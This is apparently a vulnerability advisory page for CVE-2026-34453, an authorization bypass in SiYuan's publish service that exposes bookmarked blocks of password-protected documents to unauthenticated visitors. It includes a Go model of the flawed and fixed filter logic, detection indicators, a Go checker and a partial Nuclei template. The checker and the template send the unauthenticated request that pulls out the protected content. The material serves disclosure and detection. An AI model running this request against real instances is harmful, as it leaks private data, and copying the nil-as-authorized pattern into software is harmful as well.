CVE-2026-34453
published 2026-03-31
Priority: P2 58 · Severity: high · CVSS 3.1 base score: 7.5
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
EPSS: 1.23% (65.1st percentile)
SiYuan is a personal knowledge management system. Prior to version 3.6.2, the publish service exposes bookmarked blocks from password-protected documents to unauthenticated visitors. In publish/read-only mode, /api/bookmark/getBookmark filters bookmark results by calling FilterBlocksByPublishAccess(nil, ...). Because the filter treats a nil context as authorized, it skips the publish password check and returns bookmarked blocks from documents configured as Protected. As a result, anyone who can access the publish service can retrieve content from protected documents without providing the required password, as long as at least one block in the document is bookmarked. This issue has been patched in version 3.6.2.
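To make the nil-context logic concrete, here is an added Go model of the filter. It is example code written for this page, not SiYuan's `FilterBlocksByPublishAccess` or any other project code; the types `PublishCtx`, `Doc` and `Block`, the functions `FilterVulnerable` and `FilterFixed`, and the sample documents are assumed. The vulnerable variant returns every block when the context is nil; the fixed variant treats nil as an anonymous visitor who has unlocked no protected document, so only blocks from Public documents survive without the publish password.

```go
package main

import "fmt"

// Hypothetical model of a publish-mode access filter for bookmarked blocks.
// Added example code, not SiYuan's FilterBlocksByPublishAccess; all names
// below are assumptions chosen to mirror the advisory text.

type Access int

const (
	Public    Access = iota
	Protected // readable only after the publish password has been entered
)

type Doc struct {
	ID     string
	Access Access
}

type Block struct {
	ID, DocID, Content string
}

// PublishCtx records which protected documents this visitor has unlocked.
// An anonymous publish-mode visitor has no context at all, which is the nil
// value the bookmark endpoint passes into the filter.
type PublishCtx struct {
	Unlocked map[string]bool
}

// keep decides per block whether ctx may see it; unknown documents fail closed.
func keep(ctx *PublishCtx, docs map[string]Doc, b Block) bool {
	doc, ok := docs[b.DocID]
	if !ok {
		return false
	}
	return doc.Access == Public || ctx.Unlocked[doc.ID]
}

// FilterVulnerable reproduces the flaw: nil is read as "authorized", so the
// password check is skipped and blocks from Protected documents come back.
func FilterVulnerable(ctx *PublishCtx, docs map[string]Doc, blocks []Block) []Block {
	if ctx == nil {
		return blocks
	}
	var out []Block
	for _, b := range blocks {
		if keep(ctx, docs, b) {
			out = append(out, b)
		}
	}
	return out
}

// FilterFixed treats nil as an anonymous visitor who has unlocked nothing,
// so only blocks from Public documents survive without a password.
func FilterFixed(ctx *PublishCtx, docs map[string]Doc, blocks []Block) []Block {
	if ctx == nil {
		ctx = &PublishCtx{}
	}
	var out []Block
	for _, b := range blocks {
		if keep(ctx, docs, b) {
			out = append(out, b)
		}
	}
	return out
}

// Constructed sample data: one public and one protected document, each with
// a single bookmarked block.
func SampleDocs() map[string]Doc {
	return map[string]Doc{
		"doc-public":    {ID: "doc-public", Access: Public},
		"doc-protected": {ID: "doc-protected", Access: Protected},
	}
}

func SampleBookmarks() []Block {
	return []Block{
		{ID: "b1", DocID: "doc-public", Content: "meeting notes"},
		{ID: "b2", DocID: "doc-protected", Content: "credential rotation plan"},
	}
}

func ids(bs []Block) []string {
	var out []string
	for _, b := range bs {
		out = append(out, b.ID)
	}
	return out
}

func main() {
	docs, bm := SampleDocs(), SampleBookmarks()
	fmt.Println("vulnerable, nil ctx:", ids(FilterVulnerable(nil, docs, bm)))
	fmt.Println("fixed, nil ctx:     ", ids(FilterFixed(nil, docs, bm)))
	unlocked := &PublishCtx{Unlocked: map[string]bool{"doc-protected": true}}
	fmt.Println("fixed, password ok: ", ids(FilterFixed(unlocked, docs, bm)))
}
```

The design point is that "no context" must map to the least-privileged caller, not to the most-privileged one; the fixed variant makes that explicit by materialising an empty context instead of short-circuiting, so every code path goes through the same `keep` decision.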
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| b3log | siyuan | < 3.6.2 | 3.6.2 |
| github.com | siyuan-note_siyuan_kernel | >= 0 < 3.6.2 | 3.6.2 |
| siyuan-note | siyuan | < 3.6.2 | 3.6.2 |
Detection & IOCs (extracted from sources)
- An unauthenticated POST to /api/bookmark/getBookmark with an empty JSON body ({}) returns HTTP 200 with "code":0, "type":"bookmark" and "blocks" fields, indicating the publish password check was bypassed.
- A response body containing all three strings '"code":0', '"type":"bookmark"' and '"blocks"' at once confirms that bookmarked blocks from protected documents are being returned.
- Affected versions are SiYuan <= 3.6.1; a valid version response from /api/system/version can be used to confirm the vulnerable range before running the exploitation check.
- Root cause: FilterBlocksByPublishAccess receives a nil context, skips the publish password check and treats the caller as authorized. In code review, look for a nil context passed to this filter.
- Exploitation requires at least one block in a password-protected document to be bookmarked; documents with no bookmarked blocks are not exposed through this endpoint.
- The issue is only reachable when the SiYuan publish/read-only service is exposed; instances not running the publish service are not affected.
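An added Go checker that applies the indicators above end to end (example code for this page, not the Nuclei template below and not SiYuan code): it reads `/api/system/version`, sends the unauthenticated `POST {}` to `/api/bookmark/getBookmark`, and counts bookmarked blocks in the response. That SiYuan's kernel API is POST-based, the exact JSON shapes, and the `FakeVulnerableServer` stand-in (constructed so the example runs offline) are assumptions.

```go
package main

import (
	"encoding/json"
	"fmt"
	"io"
	"net/http"
	"net/http/httptest"
	"strings"
	"time"
)

// VersionVulnerable reports whether v ("3.6.1", "v3.5.0") is below 3.6.2, the
// first patched release. Anything that is not three numbers fails closed.
func VersionVulnerable(v string) bool {
	var a, b, c int
	if n, _ := fmt.Sscanf(strings.TrimPrefix(strings.TrimSpace(v), "v"), "%d.%d.%d", &a, &b, &c); n != 3 {
		return false
	}
	return a < 3 || (a == 3 && (b < 6 || (b == 6 && c < 2)))
}

// ExposedBlocks counts the blocks in a getBookmark body. The shape assumed here,
// {"code":0,"data":[{"type":"bookmark","blocks":[...]}]}, is read off the IOC
// strings above; adjust it if a real response nests differently.
func ExposedBlocks(body []byte) int {
	var resp struct {
		Code int `json:"code"`
		Data []struct {
			Type   string            `json:"type"`
			Blocks []json.RawMessage `json:"blocks"`
		} `json:"data"`
	}
	if err := json.Unmarshal(body, &resp); err != nil || resp.Code != 0 {
		return 0
	}
	n := 0
	for _, e := range resp.Data {
		if e.Type == "bookmark" {
			n += len(e.Blocks)
		}
	}
	return n
}

// Check probes one publish service: version first (assumption: SiYuan's kernel
// API is POST-based), then the unauthenticated POST {} from the IOC list.
func Check(baseURL string) (version string, exposed int, err error) {
	client := &http.Client{Timeout: 10 * time.Second}
	post := func(path string) (int, []byte, error) {
		resp, err := client.Post(baseURL+path, "application/json", strings.NewReader("{}"))
		if err != nil {
			return 0, nil, err
		}
		defer resp.Body.Close()
		body, err := io.ReadAll(io.LimitReader(resp.Body, 1<<20))
		return resp.StatusCode, body, err
	}
	_, vbody, err := post("/api/system/version")
	if err != nil {
		return "", 0, err
	}
	var vresp struct{ Data string `json:"data"` }
	_ = json.Unmarshal(vbody, &vresp) // unparsable version: VersionVulnerable reports false
	status, bbody, err := post("/api/bookmark/getBookmark")
	if err != nil {
		return vresp.Data, 0, err
	}
	if status == http.StatusOK {
		exposed = ExposedBlocks(bbody)
	}
	return vresp.Data, exposed, nil
}

// FakeVulnerableServer is a constructed stand-in for a pre-3.6.2 publish service
// so the example runs offline; its response bodies are assumed shapes.
func FakeVulnerableServer() *httptest.Server {
	return httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		w.Header().Set("Content-Type", "application/json")
		switch r.URL.Path {
		case "/api/system/version":
			fmt.Fprint(w, `{"code":0,"msg":"","data":"3.6.1"}`)
		case "/api/bookmark/getBookmark": // two blocks of a Protected document leak
			fmt.Fprint(w, `{"code":0,"msg":"","data":[{"type":"bookmark","name":"todo",`+
				`"blocks":[{"id":"b1","content":"rotation plan"},{"id":"b2","content":"api keys"}]}]}`)
		default:
			http.NotFound(w, r)
		}
	}))
}

func main() {
	srv := FakeVulnerableServer()
	defer srv.Close()
	ver, n, err := Check(srv.URL)
	fmt.Printf("version=%s affected=%v disclosed_blocks=%d err=%v\n", ver, VersionVulnerable(ver), n, err)
}
```

Point `Check` at a real base URL instead of `srv.URL` to test an instance you are authorised to assess; a non-zero block count on a version below 3.6.2 is the finding, while a zero count on a vulnerable version only means no block in a protected document happened to be bookmarked.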
GHSA
SiYuan: Unauthenticated Access to Password-Protected Bookmarks via /api/bookmark/getBookmark
ghsa · 2026-03-31 · CVE-2026-34453 · HIGH · CWE-863
### Summary
The publish service exposes bookmarked blocks from password-protected documents to unauthenticated visitors. In publish/read-only mode, `/api/bookmark/getBookmark` filters bookmark results by calling `FilterBlocksByPublishAccess(nil, ...)`. Because the filter treats a `nil` context as authorized, it skips the publish password check and returns bookmarked blocks from documents configured as `Protected`. As a result, anyone who can access the publish service can retrieve content from protected documents without providing the required password, as long as at least one block in the document is bookmarked.
### Details
The issue is caused by an authorization bypass in the bookmark API path
OSV
SiYuan: Unauthenticated Access to Password-Protected Bookmarks via /api/bookmark/getBookmark
osv · 2026-03-31 · CVE-2026-34453 · HIGH
(Summary and Details are identical to the GHSA entry above.)
No detection rules found.
Nuclei
SiYuan <= v3.6.1 - Bookmark Data Disclosure
nuclei · CVSS 7.5 · CVE-2026-34453 · HIGH

```yaml
# The head of this template (id, info block, the first request and most of its
# version matcher) is cut off in the source. The visible remnant of the matcher
# line is:   = 0.0.1", "<= 3.6.1")'
        condition: and
    extractors:
      - type: json
        name: ver
        internal: true
        json:
          - '.data'

  - raw:
      - |
        POST /api/bookmark/getBookmark HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"code":0'
          - '"type":"bookmark"'
          - '"blocks"'
        condition: and
      - type: word
        part: content_type
        words:
          - "application/json"
      - type: status
        status:
          - 200
# digest: 4b0a00483046022100c63f02197b02aa3610c5095f509c27cdbbf81b1809470e0d130187d31bc489fd022100df90bab7ee1ee45dc9658cb8987d87cdef4ba9b37ac6184aa9578e828e52725b:922c64590222798bb761d5b6d8e72950
```

The first request extracts the version string from `.data` of `/api/system/version` into `ver` and gates the second request on it; the second request is the unauthenticated bookmark call itself. Note that the raw request needs the blank line between the headers and the `{}` body, which the source rendering had dropped.